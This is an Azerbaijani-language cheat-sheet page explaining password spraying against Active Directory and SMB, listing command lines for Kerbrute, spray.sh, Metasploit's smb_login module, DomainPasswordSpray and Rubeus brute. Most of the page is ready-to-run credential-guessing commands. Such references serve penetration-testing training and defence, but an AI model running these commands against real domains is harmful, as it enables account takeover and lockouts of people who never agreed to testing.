Password Spray Attack
Password spray nədir?
Password spray Hücumu təcavüzkarın böyük istifadəçi hovuzu olan sistemə hücum etmək üçün istifadə etdiyi hücum texnikasıdır, kobud güc(brute-force) hücumunun daha təkmil versiyasıdır. Klassik brute force hücumu bir istifadəçi adından dəfələrlə müxtəlif parolları sınamağı nəzərdə tutsa da, Password spray hücumu eyni parolu bir sıra istifadəçi adlarında sınamağı əhatə edir. Bu o deməkdir ki, təcavüzkar bir çox fərqli istifadəçi adından bir neçə ümumi və ya standart parolu sınaya bilər.Bu hücum növündə çox istifadə olunan parolar və ya default olan parolar yoxlanılır.
Bunun üçün bir çox toolardan istifadə olunur:
Linux-da istifadə olunan toollar
Kerberut istifadəsi:
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
spray istifadəsi:
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
Metasploit-in
scanner/smb/smb_login
modulu ilə:

Windows-da istifadə olunan toollar
DomainPasswordSpray istifadəsi:
# Bu əmr AD olan istifadəcilərin hamsına eyni passwordu yoxlayır
Invoke-DomainPasswordSpray -Password <PASSWORD>
# User.txt icində yazılan istifadəciləri passlist.txt faylındakı hər bir parolu yoxlayır
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
#Bu əmr "userlist.txt" faylında bloklanmaq üzrə olan hesablar olmadan domen istifadəçi siyahısını yazacaq.
Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
Rubeus brute force modulu ilə:
# istifadəçilərin siyahısı ilə
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# cari domendəki bütün istifadəçilər üçün parolları yoxlayır
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
Last updated
Was this helpful?